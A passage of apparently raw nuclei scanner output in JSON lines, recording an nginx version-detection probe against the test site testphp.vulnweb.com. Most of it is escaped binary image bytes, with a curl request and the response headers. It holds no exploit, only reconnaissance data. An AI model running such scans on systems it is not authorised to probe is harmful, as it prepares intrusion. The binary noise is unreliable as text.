0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0002\\u0003\\u0005\\u0006\\u0007\\u0001\\u0004\\ufffd\\ufffd\\u00002\\u0011\\u0000\\u0001\\u0003\\u0003\\u0002\\u0003\\u0005\\u0007\\u0004\\u0003\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0000\\u0002\\u0003\\u0004\\u00111\\u0005!\\u0012\\u0013A\\u0014Qaq\\ufffd\\u0006\\\"#\\ufffd\\ufffd\\ufffd\\ufffd2\\ufffd\\ufffd\\ufffd3R\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\ufffdW\\ufffdz\\ufffdM.\\ufffdwow\\n\\ufffdC$\\u0012\\ufffd\\ufffd\\u001b\\ufffd2\\t\\ufffd\\u0004\\u001f\\ufffd\\ufffdV\\ufffd\\ufffd\\ufffd\\u0013u\\u001b;6\\ufffd\\ufffd\\ufffdŎp6\\ufffdI\\ufffd\\u0000l\\u0000\\u0000\\u003c\\ufffd\\ufffd\\ufffd\\ufffdI$\\ufffd\\r\\ufffd\\ufffd\\ufffdxU\\ufffd/E\\ufffd]\\ufffd\\ufffd\\ufffd\\u001b\\u0018\\u0000\\u0000\\u0002\\ufffd\\u0010I\\ufffd8\\u0002\\ufffd_A\\ufffd\\ufffd\\u001f\\t;7\\ufffd^\\ufffdJ\\ufffd\\ufffd\\u0013^\\u0006\\ufffd\\ufffdMB\\ufffd\\ufffdN\\ufffdM\\ufffd]\\ufffdk\\u001b0Ei\\ufffd\\u0008\\u0019\\ufffd\\ufffd\\ufffd54R$\\ufffd\\ufffd\\u001c\\ufffdb\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdV\\ufffd}\\ufffd\\ufffd\\ufffd\\u0026\\ufffdng\\ufffd\\u001at\\ufffd\\ufffd\\ufffd\\u0010\\ufffdV^\\ufffd\\u001eB7\\ufffd\\ufffd\\ufffd܌\\ufffd\\ufffd\\u000b\\ufffdд\\u000bk\\u0013!\\ufffd\\ufffd\\ufffd#\\u001a\\ufffd\\u0000\\ufffd\\u001f\\ufffd\\ufffd\\u0017\\ufffd\\u0018\\ufffd\\ufffd@\\u001cq\\ufffd\\ufffdx\\ufffd\\ufffdC\\ufffd\\ufffd2Xn\\ufffd\\ufffd\\ufffd\\ufffd^W\\ufffd\\ufffd9\\ufffd\\ufffd,\\u001a=J\\ufffd\\r\\u0015\\ufffd\\ufffd[\\ufffdV\\ufffd\\ufffdN\\ufffdn./u\\u0012\\ufffd\\\\Or-\\ufffdF\\ufffd\\ufffd\\ufffd\\u000b\\ufffd\\t\\ufffd\\ufffd\\ufffd\\ufffdv\\u001cg\\u003cF*\\u0012\\ufffd\\ufffdJYLR\\rǟ\\ufffdKST\\ufffd\\ufffd\\ufffd\\ufffdE\\u0014Q^e\\ufffd\\ufffdc\\u000c\\u001aJy\\u0019\\ufffd+\\ufffd\\\\\\ufffdt8\\u0026\\ufffdJF)+\\ufffdh\\ufffd\\ufffd(B(\\ufffd\\ufffd\\u0010\\ufffdF))\\ufffd)\\ufffd\\ufffd\\ufffdM\\ufffdQE\\u0014%-#\\ufffd\\ufffd\\ufffd\\u003cu|\\ufffdq\\ufffd\\ufffd,\\ufffd\\u000e\\u0016(W\\ufffd.\\ufffd\\ufffd \\ufffd(9\\ufffd\\ufffd!N\\u0000\\u000c̀\\ufffd\\u001d\\u0002H\\ufffd\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffd#\\ufffd\\ufffdj\\ufffd]\\ufffd\\ufffd6\\u001a\\ufffd\\ufffd픆+\\ufffdw\\u0012D\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdG\\ufffd\\ufffdu=\\u000b\\ufffdr\\ufffd!D\\ufffd4\\ufffd\\ufffdp\\ufffd5\\ufffd\\r\\ufffd\\ufffd\\n6\\ufffd\\ufffd\\ufffd\\ufffd\\u000eq\\ufffd\\ufffd\\u0003\\ufffd6\\ufffd\\ufffdh\\ufffd\\ufffd\\ufffdψq\\u001e\\ufffd\\u001f\\ufffdUA\\ufffdk\\ufffdJ8/a\\ufffd\\ufffdwS\\ufffd6\\ufffd\\u0010\\ufffd\\u0015\\u0002M\\ufffd㴞\\u0008\\ufffd\\ufffd\\ufffd\\ufffd|V\\u0011\\u0014*\\r\\ufffd\\u0011K\\ufffd\\ufffd\\ufffdΥ\\ufffdb\\ufffd\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0015\\u001c\\\"\\ufffd\\u001c\\ufffd\\ufffd\\u0005\\u0001\\ufffd)9\\ufffd\\u0004\\u00023\\ufffd\\ufffd\\u0003Vnt\\ufffd\\ufffd\\ufffd\\ufffd,\\ufffd\\ufffd\\u0018\\u000c\\ufffd,\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd;\\ufffdT\\u0018#4\\ufffd\\u0003\\ufffd\\ufffd$_\\ufffd\\ufffdLj\\ufffds\\u001fτ\\ufffd\\u0003\\ufffd5F\\ufffde}^\\ufffd錛\\ufffd˹Q\\ufffdܟݸn\\\\\\ufffd2pI\\ufffd\\u000e\\u0018\\ufffd\\ufffdp\\ufffdA\\u001bD\\ufffd$c+\\ufffd\\u001bP\\ufffd\\u000e\\ufffdr\\ufffd}\\ufffdی\\ufffd2@\\ufffd+E\\ufffdX\\ufffd\\ufffdl\\ufffd\\ufffdI$\\ufffd\\\\͈\\ufffd1\\ufffd\\u0018.\\ufffd\\u0005\\ufffd\\ufffd\\ufffd\\u001cs\\ufffdc\\u0007\\ufffdn\\ufffd\\u001f\\ufffd\\u0012K\\ufffdY\\ufffd\\u0017\\ufffd\\ufffd\\u000eO\\ufffd6\\u0001 \\u0012pH\\u001cx\\ufffd5\\u0013\\ufffdhkj\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffd\\u0003\\ufffdі4\\ufffdT\\ufffd\\ufffd\\u0019쥺{\\ufffdB[\\ufffd=\\ufffd\\u003c\\n\\u0010 \\ufffd\\u001d\\ufffdm9ov\\ufffdy\\ufffd\\u0003\\ufffd;\\u0000\\ufffd[Qm+\\ufffdfԯ`\\u0002HmIJB\\ufffd\\u0002\\u0015\\ufffd\\ufffd\\ufffd\\ufffd\\u0001\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd\\u00157\\ufffdw\\ufffd\\ufffd\\ufffdRH\\ufffd/\\ufffd\\ufffdnTz\\ufffd\\ufffd\\t\\ufffd\\ufffd;C\\ufffd\\u000f\\u0019\\u0007;\\\\\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdҼ\\ufffd\\ufffd29\\u0006H\\u001bm\\ufffd:)\\ufffd\\ufffd{\\u0014%\\ufffdw\\ufffd\\ufffd4\\u000f\\ufffd{\\ufffdR\\ufffdK\\u001b\\ufffd)R{\\ufffd\\ufffd\\ufffdKA\\ufffd\\ufffdy\\u0019U)\\ufffd\\ufffd n%\\ufffdp2\\u0000ɮ\\ufffd\\ufffd\\ufffd4gP\\ufffd@%Cn\\ufffd|\\ufffd\\ufffd\\ufffds\\u001e\\ufffd\\ufffd\\ufffd=\\u0002\\ufffd\\ufffd\\ufffdL\\ufffdwH\\ufffd\\ufffd\\ufffd\\u0005Q\\ufffd\\ufffd\\ufffdB\\ufffd\\u001carX\\ufffd[\\ufffd\\u0018\\ufffd^X\\ufffdZ\\ufffd\\ufffd\\u000fy\\ufffdR\\ufffd\\ufffd\\ufffdn\\u001e\\ufffd\\nѤ\\ufffd\\ufffd$3\\ufffd\\ufffd\\ufffd\\ufffd.s\\ufffdd`\\ufffd\\r\\ufffdU\\ufffd\\u0004\\ufffd\\ufffd\\u0011\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\u000b\\ufffd|\\ufffdT\\r\\u000e\\ufffd\\ufffd\\ufffd\\u0000#\\ufffd\\ufffdzӲ\\ufffd\\ufffddRm\\ufffd\\ufffd-. \\ufffd\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd`q\\ufffd\\ufffd7WW\\ufffd\\u0019\\u0004py\\ufffdKTw\\ufffd\\ufffd\\ufffd\\u0015k\\ufffd^\\u0026\\ufffd\\u0014dc\\ufffd\\u0015!\\u0019\\ufffdL#\\u0014\\ufffd\\u0013\\ufffdu\\ufffdQE\\u0015ĤS[\\ufffd:\\ufffd\\ufffd\\ufffdRٔ\\ufffdQEq8\\ufffd\\ufffd\\u0010x\\ufffd\\u003e\\ufffd\\u0016ݣv{\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffdwY\\u000b\\ufffd\\ufffdE@op\\u0007\\u001f4G4\\ufffd\\ufffd,\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffdYO\\ufffd\\ufffdG\\ufffdJ\\ufffd\\u0000u1\\ufffdp\\ufffd\\u0016\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd:\\ufffd]Һ\\ufffd\\ufffdP\\ufffd\\ufffd\\ufffd\\ufffd+i\\u000b\\u003c\\u0013\\ufffd;\\ufffd\\u0002\\n\\ufffd\\ufffd\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd2\\u000b\\ufffd\\ufffdm6+\\ufffd\\u0016\\ufffd\\u0019\\ufffd\\ufffd\\u0006H\\ufffd\\ufffd2\\ufffd\\u0006\\ufffd\\u0002\\ufffd\\u0005H\\ufffd\\u0000H'#\\u000c8\\ufffd\\ufffdf\\ufffdw\\ufffd\\ufffdt\\ufffd\\ufffd\\ufffdt\\ufffd7\\ufffd\\ufffd\\ufffd`\\ufffd\\ufffdZ\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdx\\u0004\\ufffd\\u000c\\ufffdq\\ufffd\\ufffd\\ufffdƈ+\\ufffd|f\\ufffd\\u001e\\ufffdR\\ufffd\\ufffd@w\\ufffd\\ufffd\\ufffd\\ufffd\\u003e$\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffdh\\ufffd\\ufffdP\\u0010v\\ufffd\\ufffd\\u00078\\ufffd \\u000e\\u000f\\u0000\\u001c5c\\ufffd\\ufffd\\ufffdx`\\u0019\\u0026\\u0017b_\\ufffdy \\u000c\\u00021\\ufffdry\\u003e\\u0006\\u0001\\ufffd\\ufffd\\ufffdL~\\ufffd麪J\\ufffd\\ufffd\\ufffd:X\\ufffd\\ufffd\\u0018\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffdl(,s\\ufffdq\\ufffd\\ufffd8\\ufffdߤ\\ufffd\\ufffd\\ufffd^\\ufffd]\\t\\ufffd\\ufffd\\u0005e\\ufffd\\u0010\\u0006\\ufffd\\ufffd;\\ufffda\\ufffd\\u001d\\ufffd\\ufffdL\\ufffd\\ufffdg\\u0015V\\ufffd\\ufffd梮\\ufffd\\ufffd45\\ufffd\\ufffd\\ufffd\\ufffdc\\ufffdu3Y\\u003cU\\u0014\\ufffd\\u0010\\ufffd\\\\G\\ufffd\\ufffd(\\ufffd\\ufffd\\u0000\\u0004S.\\u0000S\\ufffdv\\ufffd)]\\ufffd8?\\ufffdT\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd6\\ufffdg;U\\u0007\\ufffd\\ufffd\\ufffd\\u0007\\ufffdp+Ch?\\ufffd\\ufffdeN\\ufffd͂\\ufffdz\\\\[\\u000b\\tV\\ufffd=1\\u0011f!\\ufffd\\ufffd\\u0018݁\\ufffd\\ufffd\\u0000+\\ufffd\\u0000\\ufffdO\\u0003\\ufffd\\u0006Z\\ufffd\\ufffd\\ufffd\\ufffdels\\u001cq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd}\\ufffd\\u0003\\u0005\\ufffd\\ufffd\\ufffd\\ufffd\\u0005\\u000cFv\\ufffd\\ufffdS\\ufffd\\u001dr\\ufffdD\\ufffd\\ufffd9\\ufffd\\ufffdk\\ufffd\\ufffd\\ufffd\\u0000O\\u0004!w˳n\\ufffd\\u0016*\\ufffd\\u0001\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\u0003\\ufffdU5\\ufffduN\\ufffd6\\ufffd\\u0026\\ufffdB\\ufffd{i\\ufffdh\\ufffd\\ufffd\\ufffde)\\u0018dS\\ufffd\\ufffd\\u001e\\t\\u0019\\ufffd\\u00185\\u001eA\\u001b/{\\\\\\u000e\\ufffdEE\\u003c\\ufffd0\\ufffd\\u001aE\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdEr\\ufffda\\ufffd$\\ufffd\\u0018\\ufffd\\ufffd\\ufffd.\\ufffd\\u0015\\ufffd\\ufffd(\\ufffd\\ufffdu\\ufffd$`\\r7a\\ufffd\\ufffdB\\u0001MU\\u0002\\ufffd{=-\\ufffd}\\ufffd5^\\ufffdq\\ufffd(\\\\7)\\ufffd3Y\\ufffd#\\ufffd5-\\u001e?B\\ufffdoRɑ\\ufffd\\ufffd\\ufffd\\ufffdz\\ufffd\\ufffd\\ufffdI]\\ufffd\\ufffd;\\ufffdv\\ufffd\\ufffd\\ufffdTG\\ufffd\\ufffd\\ufffd\\ufffd9\\ufffd\\ufffd#A\\u001e)\\ufffd\\ufffd|f\\ufffd6+\\ufffd\\ufffd\\ufffdz]\\ufffd\\u0015\\ufffdݴ\\ufffd\\ufffd͆\\ufffd\\ufffdFSϴ\\ufffd\\ufffdmĀ\\ufffd\\n\\u0014}ÀvΐV\\ufffd\\ufffd$\\ufffd\\ufffdE\\ufffd\\ufffd\\u0008\\u001d\\ufffdd\\ufffdz{\\ufffdl\\u00000\\ufffd\\ufffd\\ufffdA\\ufffd\\u0018\\r\\ufffd\\ufffd+\\ufffdS\\ufffd\\u0015\\ufffd\\ufffd\\u0000\\ufffd̈:;U\\ufffd\\u0018\\ufffd\\ufffdo\\ufffdC\\u001e\\ufffd\\ufffd\\u000cH\\u0014\\ufffd9\\u0000\\ufffdnq\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\\\\\ufffdZ\\u0007\\ufffd\\u003cc\\ufffd\\u001f\\u001f\\ufffd{\\ufffdc\\u0012\\ufffd\\u001er\\ufffd\\u001d\\ufffdP\\ufffd@\\ufffd\\ufffdE\\u001c\\ufffd\\ufffd+\\ufffdW\\ufffdk\\ufffd^?\\u0004\\u000f\\ufffd\\ufffdS\\ufffd\\ufffdM\\ufffd\\u00078=\\ufffd\\ufffd\\ufffd\\ufffdHc\\ufffdy\\ufffd\\ufffd S#\\ufffd\\ufffd\\ufffd\\t\\ufffd\\ufffdo\\ufffd{)$g `\\ufffddR\\ufffd-\\ufffd\\ufffdb\\u0002\\ufffd\\ufffd\\u001d(!^\\ufffd\\ufffdL\\ufffd\\\\\\ufffdZ\\u0005\\ufffd\\ufffd\\ufffd\\ufffdJ\\ufffd,ņ\\u0006;\\u000cg\\ufffd\\ufffd\\ufffd\\ufffdߨ\\ufffda\\ufffd\\ufffdԗ\\u001af\\ufffd,Q\\ufffdX\\ufffd\\ufffdn\\ufffd\\u0004\\ufffd\\u0000%\\ufffd9\\u0019V\\ufffd;\\ufffd3\\ufffd\\u001cv[\\ufffdk\\u000b)\\ufffdYA\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdA\\ufffd\\u0019\\ufffd\\ufffd\\u000f\\ufffd\\ufffd\\u0016\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\ufffds~\\u003e\\ufffdc{q$\\ufffd4r\\u0008\\ufffd\\\"\\ufffdIȐ\\ufffd\\u003c\\ufffdKc䚶\\ufffd3Hǽ\\ufffd5\\r\\u0016h\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffdAo\\ufffd\\ufffd\\ufffd[WGu\\ufffd\\ufffd\\ufffd\\ufffdjVs\\ufffd(\\ufffd}5\\ufffd.^\\u0010\\ufffd\\u00138bQ@]ː9\\u003c\\ufffd}\\ufffdkg\\ufffd\\u001f\\u0007k.@8a\\ufffd23\\ufffd\\ufffdkJ\\ufffd.\\ufffd\\ufffdӬn.\\ufffd\\ufffd\\ufffdP\\ufffd\\ufffdE\\n\\ufffd\\u001cl\\ufffd\\u0018\\ufffd\\ufffd\\u0000\\ufffd\\ufffdp\\ufffdx\\u003e\\ufffdʫ)\\u0015\\ufffdA\\u001b\\ufffd\\ufffdY$\\ufffd\\ufffd\\ufffdYcm\\ufffdc\\ufffd\\u0018\\\\\\u0000|g\\ufffd{\\ufffd\\ufffdQ\\ufffd\\ufffdԲ\\ufffdYL\\ufffdX\\ufffd\\ufffd\\u0002\\ufffdw/~\\ufffd\\u001c\\ufffd\\ufffd:glz}n\\ufffd\\ufffd\\u0014\\ufffd\\ufffd\\ufffd\\ufffdeWJ\\ufffdn\\ufffd\\u0014QE\\tK\\ufffd\\ufffdS\\ufffd?\\ufffd\\u001e\\ufffd\\ufffd\\ufffde\\ufffd\\ufffd2\\ufffd~\\ufffd\\ufffd\\ufffd\\ufffd~(E\\ufffdh\\ufffd\\ufffdw\\ufffd\\ufffd\\ufffdTl\\ufffd⤢\\ufffd\\u0003eRH\\ufffdv\\ufffd\\ufffd@\\ufffd\\u0004\\ufffd3\\ufffd\\t\\u003ce~\\ufffd\\ufffd\\ufffdW\\u0008\\ufffd\\ufffdvn\\u0018n\\u0001\\ufffdy \\ufffd\\ufffd\\u0012\\u0000\\ufffd\\ufffdG\\u0016\\ufffd\\ufffd)\\ufffd6ޙ \\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd3\\u001b\\ufffd\\ufffd?\\u0014\\ufffd7\\u0002\\u0017\\ufffdl\\ufffd\\ufffdԴ\\ufffd.QU\\ufffd\\ufffdE\\ufffd#\\ufffd~8#8$g\\ufffd\\ufffd\\ufffdޑ-\\ufffd^\\ufffd\\ufffdKp\\ufffd\\ufffd\\ufffdaLͱG~\\u0013;s\\ufffd8\\ufffd'\\ufffdq\\\\\\ufffd􃨮.\\u0012]\\u001a\\ufffd帒\\u0012\\u001a\\u0007 \\ufffdH\\ufffd\\u0014\\ufffd\\u0003\\u0001U\\ufffd\\ufffd'\\ufffd\\u0000'\\u001c\\u000cV\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd%\\t\\u001eb\\ufffdUf\\ufffd;\\u0010\\ufffdX/%w0\\ufffd9\\ufffdk*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd4;\\ufffd\\ufffd\\ufffd\\u0015ޒx*!\\ufffd:\\ufffd\\u0019X\\ufffdn\\ufffd^\\ufffd%\\ufffd\\u0001\\ufffd0\\ufffdF\\ufffdI\\ufffd\\ufffd\\u0018\\ufffd\\ufffd8 \\u001c\\ufffd\\ufffdd2\\ufffd\\u0007\\ufffd\\ufffd\\ufffdŧY\\ufffda\\ufffd8\\ufffdt\\ufffd\\ufffdQ\\u0019db\\ufffd\\ufffd\\u0018\\ufffd\\ufffdI\\u0018\\ufffdrN1\\ufffd\\ufffdV8\\ufffd\\u0015\\ufffdQD\\ufffdJv\\ufffd\\ufffd\\ufffd\\u001fUI\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdD\\ufffdK[\\ufffdqf\\ufffd\\ufffd\\ufffd*\\ufffdm\\u0004\\ufffd\\u0019\\ufffd?8\\ufffd#=\\ufffdZ\\ufffd\\ufffd\\ufffd\\ufffd.\\ufffd\\ufffdI\\ufffdC\\ufffd\\ufffdb\\ufffd\\ufffd\\u001c[\\ufffd\\ufffd#ö\\u003cn\\u0008W\\ufffd\\u0005\\ufffd\\ufffd8 \\ufffd9\\ufffd\\ufffd6IP\\ufffd\\t\\ufffd\\ufffd\\ufffdyq\\u001c\\ufffd\\ufffd7PA\\ufffd\\ufffd=\\ufffd\\ufffd\\u0015\\ufffd0 1\\ufffd+s\\ufffd\\ufffd2\\u0006pO\\ufffd\\ufffd*\\ufffd9.\\ufffd\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd=R\\ufffdd\\u003c\\ufffd\\ufffd\\\\\\ufffd\\ufffd\\u001f\\ufffd\\ufffdl\\ufffd\\ufffd\\ufffd\\u000f\\ufffdț,\\u0008e\\u0000\\ufffdq\\ufffd8$v\\ufffd\\u003cg\\ufffd\\u0017\\ufffdy\\ufffd\\ufffd\\ufffdM\\ufffdҭ\\ufffd./\\ufffd`N@P\\u0019\\ufffd\\u0004\\ufffd\\u00120q\\ufffdۃ\\ufffdv\\u0016\\u001b\\ufffd\\\"\\ufffd\\ufffdŤv2q\\ufffd\\ufffd\\ufffdѩ\\ufffd\\ufffd\\u001eI(\\ufffd\\ufffdez\\u0017\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdF\\ufffd(\\ufffd\\ufffd$\\ufffd(?ju\\u0015\\ufffdۨ\\ufffd~iʠS\\ufffd\\ufffdȺ\\u0001 \\ufffdRJŁ\\u0026\\ufffd\\ufffdv\\ufffd\\ufffd\\ufffd\\u0005\\u0001:\\u000b\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u003eU\\ufffd\\ufffd\\ufffdߐFA\\u001eA\\\"\\ufffd\\ufffdD\\ufffdV}C\\ufffd\\ufffd\\ufffd\\u0005\\u000c\\ufffd\\ufffd\\ufffdwo'\\ufffd\\ufffd\\u0019'i\\ufffdT\\ufffd\\ufffd|\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001c\\ufffdCE֯\\ufffd[\\ufffdu\\ufffdʊ\\ufffd\\ufffd\\ufffdH\\ufffdш\\ufffdq\\ufffd\\u0016\\\\\\ufffd\\u001c3\\u000c\\ufffdj\\u001fX\\ufffd;|\\u003c,6p\\ufffd|\\ufffd\\ufffd\\ufffdON\\ufffd\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffdWf\\ufffdڰ.\\ufffdVu \\u0015\\ufffd\\u0006\\u0016@G\\ufffd9\\u003c\\u001e\\ufffd\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdGiz\\ufffdŔ:\\ufffd\\ufffdۥ\\ufffd\\ufffd\\ufffdT\\ufffd\\ufffdh\\ufffd\\ufffdz\\ufffd\\ufffd\\u0006=\\ufffdvFs\\ufffdr\\t\\ufffd4\\ufffds^\\ufffd7\\ufffd\\ufffdÝ\\ufffd\\u0011\\ufffdFW\\ufffd\\ufffd\\u003eT\\ufffd\\u000ct\\ufffdV$\\ufffd\\ufffdO\\ufffd[\\ufffd\\ufffd\\ufffd\\ufffd\\u0013\\u0008cc#M\\u0004\\ufffd\\u0019W\\ufffd\\ufffd\\ufffd\\ufffdGܮ\\u001c\\ufffd\\ufffd\\n~r(i\\ufffd\\ufffdjw\\u0006\\u0018Z\\u003c\\ufffd/\\ufffd\\ufffd\\ufffdF\\ufffd\\ufffdx\\u0007\\u0004\\ufffdb21\\ufffd\\ufffdm\\ufffdu\\ufffdXZ\\ufffd*\\ufffdFھ\\ufffd\\ufffd\\u0000ҰEM\\ufffd\\ufffd$*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffdD}\\ufffd\\ufffdRzE\\u0003\\ufffd\\ufffdH\\ufffd\\ufffd\\ufffda\\ufffd\\ufffd\\u001a\\ufffd{\\ufffd0\\ufffd\\ufffd\\ufffds\\ufffd\\ufffd\\ufffd\\ufffd2\\ufffd(\\ufffd\\ufffdך\\ufffd\\u00063ڢ\\ufffd\\ufffd\\ufffd\\ufffdF\\ufffd(\\ufffd\\ufffd\\\"\\ufffd(\\ufffd\\u0008\\ufffd\\ufffd(Bl\\ufffdmEE\\u0015Ġ\\ufffd\\u0006\\ufffd'=袄\\ufffd\\ufffd\\ufffd\\u000e\\ufffdw\\ufffdj\\ufffdwd\\ufffd:\\ufffdY\\u0018e%O(\\ufffdʜv\\ufffd\\u00020@5\\ufffd:\\ufffd6WWqDIX\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffdE\\u0015\\ufffdn\\ufffd\\u0007\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffdߴ\\ufffd+m6\\ufffd\\ufffde\\nč#;rX\\ufffd\\u001e\\ufffdI$\\ufffd\\ufffdw\\ufffd\\u0000\\u0006\\u0000\\ufffd\\\\0\\u0017\\ufffd7\\ufffd\\ufffdU\\u0003\\r\\u0018\\u000b\\ufffd\\ufffd\\u0011\\ufffd\\ufffd9\\u0018\\ufffd\\u0004w\\ufffd\\u003c`\\ufffd\\ufffdȾ$\\ufffd/\\ufffd\\ufffd\\ufffd\\ufffd*\\ufffdrțö\\u003e\\ufffdW\\ufffd\\ufffd\\u0013\\ufffdO.\\ufffd=\\ufffdП\\ufffd.\\ufffd\\u0004\\u0001\\ufffd\\ufffdc\\ufffdY!\\n\\ufffd\\ufffdWv\\ufffdv\\ufffd\\u0019e\\u0007\\ufffd\\u0015\\ufffd\\ufffdf\\ufffd\\ufffdӧ\\ufffd\\ufffdmn\\ufffd\\ufffd\\ufffd\\ufffdB\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd8ݑ\\ufffd؁\\ufffd\\ufffd\\u003c`\\ufffd\\ufffd(\\ufffd:\\ufffd\\u0000\\ufffd\\u000f\\ufffdL\\ufffdOd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffdigw|\\ufffd\\ufffd)\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\u00078\\ufffd\\ufffd\\ufffd\\ufffd;\\ufffd98\\ufffd@\\ufffdE\\u0015\\u0017\\ufffd1\\ufffd\\ufffd\\ufffdE\\ufffd\\u001f`\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0002\\ufffd}\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:53.583374169Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36' 'http://testphp.vulnweb.com/pictures/3.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/nginx/nginx-version.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/nginx-version\",\"template-id\":\"nginx-version\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/nginx/nginx-version.yaml\",\"info\":{\"name\":\"Nginx version detect\",\"author\":[\"philippedelteil\",\"daffainfo\"],\"tags\":[\"tech\",\"nginx\"],\"description\":\"Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/1.jpg.tn\",\"path\":\"/pictures/1.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/1.jpg.tn\",\"extracted-results\":[\"nginx/1.19.0\"],\"request\":\"GET /pictures/1.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4355\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:34:53 GMT\\r\\nEtag: \\\"4dca64a1-1103\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001b\\u0000\\u0000\\u0002\\u0002\\u0003\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0006\\u0001\\u0005\\u0003\\u0004\\u0007\\u0002\\ufffd\\ufffd\\u00004\\u0010\\u0000\\u0002\\u0001\\u0003\\u0004\\u0001\\u0003\\u0003\\u0003\\u0003\\u0004\\u0001\\u0005\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0011\\u0005\\u0012!1A\\u0006\\u0013Q\\\"a\\ufffd